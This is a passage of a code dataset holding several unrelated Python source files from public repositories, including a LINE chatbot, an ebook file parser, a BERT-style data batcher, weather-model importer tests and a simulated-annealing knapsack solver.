template',\n\t\t\ttemplate=ButtonsTemplate(\n\t\t\t\ttitle='笨笨的我有笨笨的功能:',\n\t\t\t\ttext='小想要哪一個呢?',\n\t\t\t\tactions=[\n\t\t\t\t\tMessageTemplateAction(\n\t\t\t\t\t\tlabel='我想看小說',\n\t\t\t\t\t\ttext='我想看小說'\n\t\t\t\t\t)\n\t\t\t\t]\n\t\t\t)\n\t\t)\n\t\t\n\t\tline_bot_api.reply_message(event.reply_token, buttons_template)\n\t\t\t\n\t# 其他\n\telse:\n\t\tline_bot_api.reply_message(\n\t\t\tevent.reply_token, \n\t\t\tTextSendMessage(text=\"\"\"我笨笨的,聽不懂妳在說什麼\\n\"\"\"))\n\t\t\n\t\t\n\t\n\nif __name__ == \"__main__\":\n app.run()\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n","repo_name":"skydome20/linebot-test","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"16641436973","text":"#! /usr/bin/python\n# coding=UTF-8\n\nimport foxOS\nimport re\n\ndef loadFML(shelfPath='FoxBook.fml'):\n\ttxt = foxOS.fileread(shelfPath)\n\n\tbn = re.compile('(.*?)', re.I)\n\tbu = re.compile('(.*?)', re.I)\n\tbd = re.compile('(.*?)', re.S|re.I)\n\tbs = re.compile('(.*?)', re.I)\n\tbq = re.compile('(.*?)', re.I)\n\tba = re.compile('(.*?)', re.I)\n\tbcs = re.compile('(.*?)', re.S|re.I)\n\n\tpn = re.compile('(.*?)', re.I)\n\tpu = re.compile('(.*?)', re.I)\n\tps = re.compile('(.*?)', re.I)\n\tpc = re.compile('(.*?)', re.S|re.I)\n\n\tsc = re.compile('(.*?)', re.S|re.I)\n\tcc = re.compile('(.*?)', re.S|re.I)\n\n\tshelf = []\n\tfor bookg in sc.finditer(txt):\n\t\tbook = {}\n\t\tbookStr = bookg.group(1)\n\t\tbook['bookname'] = bn.findall(bookStr)[0]\n\t\tbook['bookurl'] = bu.findall(bookStr)[0]\n\t\tbook['delurl'] = bd.findall(bookStr)[0]\n\t\tbook['statu'] = bs.findall(bookStr)[0]\n\t\tbook['author'] = ba.findall(bookStr)[0]\n\t\tbook['qidianBookID'] = bq.findall(bookStr)[0]\n\t\tpages = []\n\t\tfor pageg in cc.finditer(bookStr):\n\t\t\tpage = {}\n\t\t\tpageStr = pageg.group(1)\n\t\t\tpage['pagename'] = pn.findall(pageStr)[0]\n\t\t\tpage['pageurl'] = pu.findall(pageStr)[0]\n\t\t\tpage['size'] = ps.findall(pageStr)[0]\n\t\t\tpage['content'] = pc.findall(pageStr)[0]\n\t\t\tpages.append(page)\n\t\tbook['chapters'] = pages\n\t\tshelf.append(book)\n\treturn shelf\n\ndef saveFML(shelf, savePath='FoxBook.fml'):\n\tfml = ['\\n\\n\\n']\n\tfor book in shelf:\n\t\tfml.append('')\n\t\tfml.append('\\t' + book['bookname'] + '')\n\t\tfml.append('\\t' + book['bookurl'] + '')\n\t\tfml.append('\\t' + book['delurl'] + '')\n\t\tfml.append('\\t' + book['statu'] + '')\n\t\tfml.append('\\t' + book['qidianBookID'] + '')\n\t\tfml.append('\\t' + book['author'] + '')\n\t\tfml.append('')\n\t\tfor page in book['chapters'] :\n\t\t\tfml.append('')\n\t\t\tfml.append('\\t' + page['pagename'] + '')\n\t\t\tfml.append('\\t' + page['pageurl'] + '')\n\t\t\tfml.append('\\t' + page['content'] + '')\n\t\t\tfml.append('\\t' + page['size'] + '')\n\t\t\tfml.append('')\n\t\tfml.append('')\n\t\tfml.append('\\n')\n\tfml.append('\\n')\n\tfoxOS.filewrite('\\n'.join(fml), savePath)\n\n\n# main 测试\nif \"__main__\" == __name__ :\n\timport time\n\tsTime = time.clock()\n\tshelf = loadFML('D:\\\\bin\\\\sqlite\\\\FoxBook\\\\FoxBook.fml.old')\n\n\teTime1 = time.clock() - sTime\n\tsTime = time.clock()\n\n\tsaveFML(shelf, './xxx.fml')\n\n\teTime2 = time.clock() - sTime\n\n\tprint(eTime1)\n\tprint(eTime2)\n\n\"\"\"\nfor book in shelf:\n\tprint( book['bookurl'] + \"|\" + book['bookname'].decode('UTF-8').encode('GBK') )\n\tfor page in book['chapters'] :\n\t\tprint( \"\\t\" + page['pageurl'] + \"|\" + page['pagename'].decode('UTF-8').encode('GBK') 
)\n\"\"\"\n\n","repo_name":"linpinger/foxbook-python27","sub_path":"fmlStor.py","file_name":"fmlStor.py","file_ext":"py","file_size_in_byte":3039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"74626043476","text":"from django.urls import path\nfrom .views import home, getAllItems, addItem, addBill, Register, updateItems, getPdf\n\nurlpatterns = [\n path('',home,name='home'),\n path('getAllItems/',getAllItems,name=\"Getallitems\"),\n path('addItem/',addItem,name=\"Additem\"),\n path('register/',Register,name=\"Register\"),\n path('addBill/',addBill,name=\"Addbill\"),\n path('updateItem/',updateItems,name=\"UpdateItem\"),\n path('getPdf/',getPdf,name=\"GetPdf\"),\n]\n","repo_name":"KartikKapil/Disecto_Assignment","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"26649135595","text":"import array\nimport numpy as np\nimport random\nimport math\nimport os\nimport logging\nimport time\nimport argparse\n\n\nclass Vocabulary(object):\n\n def __init__(self, path, min_occurrences=500, build=False):\n self._tok2id = {}\n self._id2tok = {}\n self._n_occurrences = {}\n self.unk = ''\n self.pad = ''\n self.mask = ''\n self.bos = ''\n self.eos = ''\n self._unk_id = -1\n self._pad_id = -1\n self._mask_id = -1\n self._bos_id = -1\n self._eos_id = -1\n\n if build:\n self._build(path)\n else:\n self._load(path)\n\n if self._unk_id == -1:\n self._unk_id = self._allocate_id(self.unk)\n if self._pad_id == -1:\n self._pad_id = self._allocate_id(self.pad)\n if self._mask_id == -1:\n self._mask_id = self._allocate_id(self.mask)\n if self._bos_id == -1:\n self._bos_id = self._allocate_id(self.bos)\n if self._eos_id == -1:\n self._eos_id = self._allocate_id(self.eos)\n\n self._vocab = set(\n [tok for tok, n_occurrences in self._n_occurrences.items()\n if n_occurrences >= min_occurrences])\n\n for n_occurrences in self._n_occurrences.values():\n if n_occurrences < min_occurrences:\n self._n_occurrences[self._unk_id] += n_occurrences\n \n self._vocab.add(self._unk_id)\n self._vocab.add(self._pad_id)\n self._vocab.add(self._mask_id)\n self._vocab.add(self._bos_id)\n self._vocab.add(self._eos_id)\n \n # sort vocab so that most frequent tokens come first\n self._vocab_list = sorted(\n list(self._vocab), key=lambda t: (-self._n_occurrences[t], t))\n self.size = len(self._vocab)\n \n self._tokid2vocabid = {\n tok_id: vocab_id\n for vocab_id, tok_id in enumerate(self._vocab_list)}\n self.unk_vocab_id = self._tokid2vocabid[self._unk_id]\n self.pad_vocab_id = self._tokid2vocabid[self._pad_id]\n self.mask_vocab_id = self._tokid2vocabid[self._mask_id]\n self.bos_vocab_id = self._tokid2vocabid[self._bos_id]\n self.eos_vocab_id = self._tokid2vocabid[self._eos_id]\n\n self.freq = np.ones([self.size])\n for i, tok in enumerate(self._vocab_list):\n self.freq[i] += float(self._n_occurrences[tok])\n self.freq /= np.sum(self.freq)\n\n def _allocate_id(self, token):\n new_id = len(self._tok2id)\n self._tok2id[token] = new_id\n self._id2tok[new_id] = token\n self._n_occurrences[new_id] = 0\n return new_id\n\n def id2str(self, vocab_id):\n return self._id2tok[self._vocab_list[vocab_id]]\n\n def str2id(self, token):\n if token not in [\n self.mask, self.bos, self.eos, self.pad, self.unk]:\n token = token.lower()\n if token not in self._tok2id:\n return self.unk_vocab_id\n token_id = self._tok2id[token]\n if token_id not in 
self._vocab:\n return self.unk_vocab_id\n return self._tokid2vocabid[token_id]\n\n def sentence2str(self, sentence):\n return ' '.join([self.id2str(x) for x in sentence\n if x != self.pad_vocab_id])\n\n def write_vocab_file(self, vocab_path):\n with open(vocab_path, 'w') as f:\n f.write('%d %d\\n' % (len(self._tok2id), self.n_tokens))\n\n for i in range(len(self._tok2id)):\n n_occurrences = (0 if i == self._unk_id\n else self._n_occurrences[i])\n f.write('%s %d\\n' % (self._id2tok[i], n_occurrences))\n\n def get_n_occurrences(self, vocab_id):\n return self._n_occurrences[self._vocab_list[vocab_id]]\n\n def _load(self, path):\n \"\"\" The format of the vocab file is as follows:\n n_unique_tokens n_tokens_total\n token_1 n_occurrences_1\n token_2 n_occurrences_2\n .\n .\n .\n token_n n_occurrences_n\"\"\"\n logging.info('Loading vocab from %s...' % path)\n with open(path, 'r') as f:\n ns = f.readline().strip().split()\n self._n_unique_tokens = int(ns[0])\n self.n_tokens = int(ns[1])\n \n for i in range(self._n_unique_tokens):\n line = f.readline().strip().split()\n if len(line) != 2:\n logging.warn('Invalid line: ' + str(line))\n continue\n tok = line[0]\n count = int(line[1])\n self._tok2id[tok] = i\n self._id2tok[i] = tok\n self._n_occurrences[i] = count\n if tok == self.unk:\n self._unk_id = i\n elif tok == self.pad:\n self._pad_id = i\n elif tok == self.mask:\n self._mask_id = i\n elif tok == self.bos:\n self._bos_id = i\n elif tok == self.eos:\n self._eos_id = i\n\n def _build(self, path):\n self._n_unique_tokens = 0\n self.n_tokens = 0\n \n with open(path, 'r') as f:\n for line in f:\n tokens = line.strip().split()\n for tok in tokens:\n tok = tok.lower()\n self.n_tokens += 1\n if self.n_tokens % 10000000 == 0:\n logging.info(\n 'Read %d million tokens' %\n (self.n_tokens // 1000000))\n if tok in self._tok2id:\n tokid = self._tok2id[tok]\n self._n_occurrences[tokid] += 1\n else:\n tokid = self._n_unique_tokens\n self._n_unique_tokens += 1\n self._tok2id[tok] = tokid\n self._id2tok[tokid] = tok\n self._n_occurrences[tokid] = 1\n if tok == self.unk:\n self._unk_id = i\n elif tok == self.mask:\n self._mask_id = i\n elif tok == self.bos:\n self._bos_id = i\n elif tok == self.eos:\n self._eos_id = i\n\nclass Batch(object):\n\n def __init__(self, unmasked_seqs, masked_seqs, seq_len,\n target_positions, targets, line_num=0):\n self.unmasked_seqs = unmasked_seqs\n self.masked_seqs = masked_seqs\n self.seq_len = seq_len\n self.target_positions = target_positions\n self.targets = targets\n self.line_num = line_num\n\n def n_tokens(self):\n return np.sum(self.seq_len - 2)\n\nclass ProtoBatch(object):\n\n def __init__(self, size, length, pad):\n self._size = size\n self._unmasked_seqs = pad * np.ones([size, length], dtype=np.int32)\n self._masked_seqs = pad * np.ones([size, length], dtype=np.int32)\n self._seq_len = np.zeros([size], dtype=np.int32)\n self._target_positions = []\n self._targets = []\n self._length = length\n self._count = 0\n self._line_num = 0\n\n def to_batch(self):\n if self._count < self._size:\n self._unmasked_seqs = self._unmasked_seqs[:self._count, :]\n self._masked_seqs = self._masked_seqs[:self._count, :]\n self._seq_len = self._seq_len[:self._count]\n\n return Batch(self._unmasked_seqs,\n self._masked_seqs,\n self._seq_len,\n np.array(self._target_positions),\n np.array(self._targets),\n line_num=self._line_num)\n\n def add_sentence(self, s, target_indices, masks, line_num):\n self._line_num = line_num\n n = len(s)\n self._unmasked_seqs[self._count, :n] = s\n for i, index 
in enumerate(target_indices):\n self._target_positions.append(\n self._count * self._length + index)\n self._targets.append(s[index])\n s[index] = masks[i]\n\n self._masked_seqs[self._count, :n] = s\n self._seq_len[self._count] = n\n\n self._count += 1\n\n return self._count == self._size\n\n \nclass Batcher(object):\n\n def __init__(self, batch_size, max_length, pad,\n variable_length=False, pad_prob=0.1):\n self._batch_size = batch_size\n self._max_length = max_length\n self._pad = pad\n self._variable_length = variable_length\n self._pad_prob = pad_prob\n self._proto_batches = [\n self._make_proto_batch(length)\n if self._variable_length or length == self._max_length\n else\n None\n for length in range(self._max_length + 1)]\n\n def _make_proto_batch(self, length):\n return ProtoBatch(\n self._batch_size, length, self._pad)\n\n def add_sentence(self, s, target_indices, masks, line_num):\n if self._variable_length:\n length = len(s)\n if len(s) < self._max_length and random.random() < self._pad_prob:\n length = random.randint(length + 1, self._max_length)\n else:\n length = self._max_length\n\n if self._proto_batches[length].add_sentence(\n s, target_indices, masks, line_num):\n batch = self._proto_batches[length].to_batch()\n self._proto_batches[length] = self._make_proto_batch(length)\n return batch\n\n return None\n\nclass Corpus(object):\n\n def __init__(self, path, vocab):\n self._path = path\n self._vocab = vocab\n\n def read_lines(self, max_seq_len):\n while True:\n with open(self._path, 'r') as f:\n for i, line in enumerate(f):\n tokens = line.strip().split()\n if len(tokens) > max_seq_len - 2 or len(line) == 0:\n continue\n yield ([self._vocab.bos_vocab_id] +\n [self._vocab.str2id(t) for t in tokens] +\n [self._vocab.eos_vocab_id], i)\n\n def generate_batches(self, batch_size, max_seq_len, mask_prob,\n must_contain=None, variable_length=False,\n pad_prob=0.1, masking_policy=[1.0, 0.0, 0.0]):\n batcher = Batcher(batch_size, max_seq_len, self._vocab.pad_vocab_id,\n variable_length=variable_length, pad_prob=pad_prob)\n for line, line_num in self.read_lines(max_seq_len):\n if must_contain is not None:\n valid = False\n for t in line:\n if t == must_contain:\n valid = True\n if not valid:\n continue\n if mask_prob > 0.0:\n mask_values = np.random.uniform(size=[len(line) - 2])\n target_indices = np.where(mask_values < mask_prob)[0] + 1\n if len(target_indices) == 0:\n continue\n masks = []\n assert abs(sum(masking_policy) - 1.0) < 1e-6\n mask_token_thresh = masking_policy[0]\n self_thresh = mask_token_thresh + masking_policy[1]\n for i in target_indices:\n r = random.random()\n if r < mask_token_thresh:\n masks.append(self._vocab.mask_vocab_id)\n elif r < self_thresh:\n masks.append(line[i])\n else:\n while True:\n t = random.randint(0, self._vocab.size-1)\n if t not in [self._vocab.pad_vocab_id,\n self._vocab.bos_vocab_id,\n self._vocab.eos_vocab_id]:\n masks.append(random.randint(0, self._vocab.size-1))\n break\n else:\n target_indices = []\n masks = []\n \n maybe_batch = batcher.add_sentence(\n line, target_indices, masks, line_num)\n if maybe_batch is not None:\n yield maybe_batch\n\n","repo_name":"AlanAnsell/PolyLM","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":12455,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"85"} +{"seq_id":"10378043827","text":"from turtle import Turtle\n\nMOVE_DISTANCE = 50\n\n\nclass Paddle(Turtle):\n def __init__(self, position):\n super().__init__()\n self.penup()\n 
self.shapesize(stretch_wid=5, stretch_len=1)\n self.shape('square')\n self.color('white')\n self.goto(position)\n\n def go_up(self):\n if self.ycor() < 250:\n self.goto(self.xcor(), self.ycor() + MOVE_DISTANCE)\n\n def go_down(self):\n if self.ycor() > -250:\n self.goto(self.xcor(), self.ycor() - MOVE_DISTANCE)\n","repo_name":"M-Anwar-Hussaini/Pong-Game","sub_path":"paddle.py","file_name":"paddle.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"70787323158","text":"\"\"\"Module to test NWP importer module.\n\"\"\"\nimport unittest\nfrom datetime import datetime\nfrom glob import glob\nfrom shutil import rmtree\nfrom os import makedirs, path\n\nfrom unimodel.io.importers_nwp import import_nwp_grib\n\n\nclass TestNWPImporter(unittest.TestCase):\n \"\"\"Tests function to import NWP grib files from filer to stage dir.\"\"\"\n\n config = {\n \"moloch_ecm\": {\n \"src_tar\": \"tests/data/nwp_src/moloch/\"\n \"moloch-grib2.{year}{month}{day}{run}\"\n \".1p6.tar.gz\",\n \"src\": \"moloch-1p6-rep.{year}{month}{day}{run}_{lt}.grib2\",\n \"compressed\": True,\n \"lead_time_digits\": 2,\n },\n \"wrf43_prs\": {\n \"src\": \"tests/data/nwp_src/wrf43_prs/\"\n \"WRFPRS-03.{year}{month}{day}{run}_{lt}\"\n \".grib\",\n \"compressed\": False,\n \"lead_time_digits\": 3,\n },\n \"wrf43_prs_tar\": {\n \"src\": \"tests/data/nwp_src/wrf43_prs/\"\n \"WRFPRS-03.{year}{month}{day}{run}_\"\n \"{lt}.grib\",\n \"lead_time_digits\": 3,\n \"compressed\": True,\n },\n \"ecmwf_hres\": {\n \"src\": \"tests/data/nwp_src/ecmwf_hres/A1S{month}\"\n \"{day}{run}00{valid_month}{valid_day}{valid_hour}1-99\",\n \"compressed\": False,\n },\n \"wrf_tl_ens\": {\n \"src_tar\": \"tests/data/nwp_src/wrf_tl_ens/\"\n \"NWCST_TL_ENS-membres.{year}{month}{day}{run}.tar.gz\",\n \"src\": \"tl_ens-03-{member}.{year}{month}{day}{run}_{lt}.grib\",\n \"compressed\": True,\n \"lead_time_digits\": 2,\n },\n \"no_lt_digits\": {\n \"src\": \"tests/data/nwp_src/wrf43_prs/\"\n \"WRFPRS-03.{year}{month}{day}{run}_{lt}\"\n \".grib\",\n \"compressed\": False,\n },\n \"wrf_gfs_3\": {\n \"src\": \"tests/data/nwp_src/wrf_gfs_3/WRFPRS_d01.{lt}\",\n \"compressed\": False,\n \"lead_time_digits\": 3,\n },\n \"nwp_dir\": \"tests/data/nwp_dir/\",\n }\n\n def setUp(self) -> None:\n moloch_dir = \"tests/data/nwp_dir/moloch_ecm\"\n if path.isdir(moloch_dir):\n rmtree(moloch_dir)\n\n makedirs(moloch_dir)\n open(\"tests/data/nwp_dir/moloch_ecm/example.tar.gz\", \"wb\")\n open(\"tests/data/nwp_dir/moloch_ecm/example.grib2\", \"wb\")\n\n wrfprs_dir = \"tests/data/nwp_dir/wrf43_prs\"\n if path.isdir(wrfprs_dir):\n rmtree(wrfprs_dir)\n\n makedirs(wrfprs_dir)\n open(\"tests/data/nwp_dir/wrf43_prs/WRFPRS_d01.001\", \"wb\")\n open(\"tests/data/nwp_dir/wrf43_prs/WRFPRS_d01.000\", \"wb\")\n\n return super().setUp()\n\n def test_io_import_nwp_grib_compressed(self):\n \"\"\"Tests import of a compressed grib file\"\"\"\n nwp_file = import_nwp_grib(\n datetime(2022, 11, 7, 0), 0, \"moloch_ecm\", self.config\n )\n\n self.assertEqual(\n nwp_file,\n \"tests/data/nwp_dir/moloch_ecm/moloch-1p6-rep.2022110700_00.grib2\",\n )\n\n def test_io_import_nwp_grib_compressed_tar_not_found(self):\n \"\"\"Tests import of a compressed grib file\"\"\"\n with self.assertRaises(FileNotFoundError) as err:\n import_nwp_grib(datetime(2022, 11, 15, 0), 0, \"moloch_ecm\", self.config)\n\n self.assertEqual(\n err.exception.args[0],\n \"tests/data/nwp_src/moloch/\"\n \"moloch-grib2.2022111500.1p6.tar.gz 
not found.\",\n )\n\n def test_io_import_nwp_grib_compressed_src_not_found(self):\n \"\"\"Tests import of a compressed grib file\"\"\"\n with self.assertRaises(FileNotFoundError) as err:\n import_nwp_grib(datetime(2022, 11, 7, 0), 200, \"moloch_ecm\", self.config)\n\n self.assertEqual(\n err.exception.args[0],\n \"moloch-1p6-rep.2022110700_200.grib2 not found in \"\n \"tests/data/nwp_src/moloch/\"\n \"moloch-grib2.2022110700.1p6.tar.gz.\",\n )\n\n def test_io_import_nwp_grib_not_compressed(self):\n \"\"\"Tests import of a not compressed grib file\"\"\"\n nwp_file = import_nwp_grib(\n datetime(2023, 2, 6, 0), 32, \"wrf43_prs\", self.config\n )\n\n self.assertEqual(\n nwp_file, \"tests/data/nwp_dir/wrf43_prs/WRFPRS-03.2023020600_032.grib\"\n )\n\n def test_io_import_nwp_grib_not_compressed_not_found(self):\n \"\"\"Tests import of a compressed grib file\"\"\"\n with self.assertRaises(FileNotFoundError) as err:\n import_nwp_grib(datetime(2022, 11, 15, 0), 0, \"wrf43_prs\", self.config)\n\n self.assertEqual(\n err.exception.args[0],\n \"tests/data/nwp_src/wrf43_prs/WRFPRS-03.2022111500_000.grib not found.\",\n )\n\n def test_io_import_nwp_grib_model_not_in_config(self):\n \"\"\"Tests import of a model not in configuration dictionary\"\"\"\n with self.assertRaises(KeyError) as err:\n import_nwp_grib(datetime(2022, 11, 7, 0), 2, \"molcho\", self.config)\n\n self.assertEqual(\n err.exception.args[0], \"molcho not in configuration dictionary.\"\n )\n\n def test_io_import_nwp_grib_model_not_src_tar(self):\n \"\"\"Tests import of a comprsessed model without src_tar\"\"\"\n with self.assertRaises(KeyError) as err:\n import_nwp_grib(datetime(2022, 11, 7, 0), 2, \"wrf43_prs_tar\", self.config)\n\n self.assertEqual(\n err.exception.args[0],\n \"src_tar must be included if compressed is set to True.\",\n )\n\n def test_io_import_nwp_grib_ecmwf_lt_0(self):\n \"\"\"Tests import of a ECMWF-HRES grib file corresponding to lt=0\"\"\"\n nwp_file = import_nwp_grib(\n datetime(2023, 2, 20, 0), 0, \"ecmwf_hres\", self.config\n )\n\n self.assertEqual(\n nwp_file, \"tests/data/nwp_dir/ecmwf_hres/A1S02200000022000011-99\"\n )\n\n def test_io_import_nwp_grib_ecmwf_lt_not_0(self):\n \"\"\"Tests import of a ECMWF-HRES grib file corresponding to lt!=0\"\"\"\n nwp_file = import_nwp_grib(\n datetime(2023, 2, 20, 0), 6, \"ecmwf_hres\", self.config\n )\n\n self.assertEqual(\n nwp_file, \"tests/data/nwp_dir/ecmwf_hres/A1S02200000022006001-99\"\n )\n\n def test_io_import_nwp_tl_ens_grib_compressed(self):\n \"\"\"Tests import of a compressed grib file\"\"\"\n nwp_file = import_nwp_grib(\n datetime(2023, 10, 19, 0), 1, \"wrf_tl_ens\", self.config\n )\n\n self.assertEqual(\n sorted(nwp_file)[0],\n \"tests/data/nwp_dir/wrf_tl_ens/tl_ens-03-001.2023101900_01.grib\",\n )\n self.assertEqual(len(nwp_file), 12)\n\n # Double test to check re-use of already extracted files from a .tar.gz\n nwp_file = import_nwp_grib(\n datetime(2023, 10, 19, 0), 4, \"wrf_tl_ens\", self.config\n )\n\n self.assertEqual(\n sorted(nwp_file)[0],\n \"tests/data/nwp_dir/wrf_tl_ens/tl_ens-03-001.2023101900_04.grib\",\n )\n self.assertEqual(len(nwp_file), 12)\n\n def test_io_import_nwp_grib_model_not_lt_digits(self):\n \"\"\"Tests import of a comprsessed model without src_tar\"\"\"\n with self.assertRaises(KeyError) as err:\n import_nwp_grib(datetime(2022, 11, 7, 0), 2, \"no_lt_digits\", self.config)\n\n self.assertEqual(\n err.exception.args[0],\n \"If named argument {lt} in \"\n \"'src', then 'lead_time_digits' must be \"\n \"specified.\",\n )\n\n def 
test_io_import_nwp_conflicting_lead_times(self):\n \"\"\"Tests importing files with conflicting lead times\n (ex 12 and 120)\"\"\"\n nwp_file = import_nwp_grib(\n datetime(2022, 11, 19, 0), 12, \"wrf_gfs_3\", self.config\n )\n self.assertTrue(isinstance(nwp_file, str))\n self.assertNotEqual(nwp_file, \"tests/data/nwp_dir/WRFPRS_d01.120\")\n\n # def test_io_import_nwp_file_not_in_tar(self):\n # \"\"\"Tests importing files with conflicting lead times\n # (ex 12 and 120)\"\"\"\n # modified_config = deepcopy(self.config)\n # modified_config['moloch_ecm']['src'] = 'wrong_file_name'\n\n # nwp_file = import_nwp_grib(\n # datetime(2022, 11, 7, 0), 0, \"moloch_ecm\", modified_config\n # )\n # self.assertTrue(isinstance(nwp_file, str))\n # self.assertNotEqual(nwp_file, \"tests/data/nwp_dir/WRFPRS_d01.120\")\n\n def tearDown(self) -> None:\n for f_dir in glob(self.config[\"nwp_dir\"] + \"/*\"):\n rmtree(f_dir)\n return super().tearDown()\n","repo_name":"meteocat/unimodel","sub_path":"tests/test_importers_nwp.py","file_name":"test_importers_nwp.py","file_ext":"py","file_size_in_byte":8494,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"29822342893","text":"import matplotlib.pyplot as plt\n\n# load file\n#individualsFile = \"allIndividuals.csv\"\nindividualsFile = \"results-server-malices/allIndividuals-p0.01.csv\"\ninfluenceValues = []\nnodesValues = []\n\nwith open(individualsFile, \"r\") as fp :\n\tlines = fp.readlines()\n\t# pop the header\n\theader = lines.pop(0)\n\t\n\tfor line in lines :\n\t\ttokens = line.rstrip().split(',')\n\t\tinfluenceValues.append( float(tokens[0]) )\n\t\tnodesValues.append( float(tokens[1]) )\n\t\t\n\nfig = plt.figure()\nax = fig.add_subplot(111)\nax.set_title(\"NSGA-II\")\nax.set_xlabel(\"influence\")\nax.set_ylabel(\"nodes in the seed set\")\nax.plot(influenceValues, nodesValues, 'bo')\nplt.savefig(individualsFile[:-4] + \".png\")\n","repo_name":"albertotonda/Influence-Maximization","sub_path":"src_OLD/multiObjective-inspyred/plot-individuals.py","file_name":"plot-individuals.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"85"} +{"seq_id":"70410055638","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\n * Implementation of simulated annealing for multi objective discrete problems.\r\n * \r\n * Description : Graphically solve the problems contained in kp directory\r\n * Display the results continuously in the terminal.\r\n * Convert all the problems to 2 objectives problems in graphical mode.\r\n * So it can be ploted.\r\n * \r\n * Author : Thibault Charmet\r\n * Creation date : 01/2020\r\n\"\"\"\r\n\r\nimport os\r\nimport numpy as np\r\nimport json\r\nimport time\r\nfrom random import random, randint\r\nimport math\r\nfrom matplotlib import pyplot as plt\r\nfrom operator import itemgetter\r\n\r\n# does the program displays graĥical evolution of the results\r\n# if true the number of objectives will be brought to 2\r\ngraphical = True\r\n# if true generate a plot window for each solution\r\none_window_by_solution = False\r\n# maximum number of problems to solve (-1 means everything)\r\nmax_files = -1\r\n\r\n# directory where the problems can be found\r\n# http://home.ku.edu.tr/~moolibrary/kp.zip\r\ndirectory = \"kp\"\r\n\r\n# algorithm parameters\r\nalpha = 0.99\r\nTmax = 300\r\nTmin = 10e-5\r\nequilibre = 20\r\n\r\n# solve discete knapsack problems contained in the kp directory \r\nfiles = [f for 
f in os.listdir(directory) if os.path.isfile(os.path.join(directory, f)) and f.endswith(\".dat\")]\r\n# limit the number of files\r\nfiles = files[0:max_files]\r\nprint(files)\r\n\r\n\r\ndef read_file(filename):\r\n \"\"\"\r\n read a file of format\r\n number of objectives\r\n number of objects to choose from\r\n capactity of the knapsack (max weight supported)\r\n values of the different objects to pick (one column by object)\r\n last line is the weights of the differents objects to pick\r\n \"\"\"\r\n with open(filename, 'r') as stream:\r\n objectives = int(stream.readline().rstrip()) \r\n if graphical:\r\n # bring it to 2 dimentions for display purpose\r\n objectives = 2\r\n objects = int(stream.readline().rstrip())\r\n capacity = int(stream.readline().rstrip())\r\n lines = stream.readlines()\r\n weights = lines[-1]\r\n # using json to convert to list\r\n weights = json.loads(weights)\r\n del lines[-1]\r\n values = json.loads(\"\".join(lines))\r\n if graphical:\r\n values = values[0:2]\r\n return objectives, objects, capacity, weights, values\r\n \r\n\r\ndef approximate_objective(X):\r\n \"\"\"global objective function that approximate\r\n a value that consider all objectives functions\"\"\"\r\n somme = 0\r\n for xn in X:\r\n for i in range(objectives):\r\n somme += math.log(values[i][xn])\r\n return somme\r\n\r\n\r\ndef voisin(X):\r\n \"\"\"Find all the neighbour of a point.\r\n Here a point is a knapsack configuration.\r\n Return a slightly modified version of the knapsack.\"\"\"\r\n res = list(X)\r\n # either remove of add element\r\n if (len(X) == 0) or (randint(0, 1) == 0):\r\n # adding\r\n # if not exceding capacity\r\n if sum(map(lambda xn : weights[xn], X)) < capacity:\r\n sX = set(X)\r\n sX.add(randint(0, objects-1))\r\n res = list(sX)\r\n else:\r\n # removing\r\n if len(X) > 1:\r\n del res[randint(0, len(X)-1)]\r\n return res\r\n\r\n\r\ndef dominance(Xa, Xb):\r\n \"\"\"\r\n X1 dominates X2 if\r\n - X1 is at least as good as X2 in all objectives\r\n - X1 is strictly better than X2 in, at least, one objective.\r\n \"\"\"\r\n as_good = True\r\n superior = False\r\n for i in range(objectives):\r\n scoreA = sum(values[i][xa] for xa in Xa)\r\n scoreB = sum(values[i][xb] for xb in Xb)\r\n as_good = as_good and scoreA >= scoreB\r\n superior = superior or scoreA > scoreB\r\n return as_good and superior\r\n\r\n# test it\r\n# print(dominance([8, 4, 7], [8, 4, 7]))\r\n\r\ndef clean(domine, pareto_front):\r\n \"\"\"remove all dominated elements from the pareto front\"\"\"\r\n for elt in domine:\r\n pareto_front.remove(elt)\r\n return pareto_front\r\n\r\n\r\ndef annealing(objectives, objects, capacity, weights, values, fig=None, line1=None, line2=None):\r\n \"\"\"simulated annealing algorithm\"\"\"\r\n # X = (x1, x2, ...)\r\n X = [0]\r\n fX = approximate_objective(X)\r\n # all points that are not dominated\r\n pareto_front = [X]\r\n # list of the points previously in the pareto front\r\n archive_pareto = []\r\n T = Tmax\r\n\r\n # create a figure for the problem\r\n if graphical:\r\n abss = [sum(values[0][x] for x in point) for point in pareto_front]\r\n ordo = [sum(values[1][x] for x in point) for point in pareto_front]\r\n if not fig or not line2 or not line2:\r\n plt.ion()\r\n fig = fig or plt.figure()\r\n ax = fig.add_subplot(111)\r\n line2, = ax.plot(abss, ordo, 'go')\r\n line1, = ax.plot(abss, ordo, '-o')\r\n plt.xlim([0, 1.2 * max(abss)])\r\n plt.ylim([0, 1.2 * max(ordo)])\r\n\r\n while T > Tmin :\r\n # constant temperature\r\n for i in range(equilibre):\r\n voisin_X = voisin(X)\r\n 
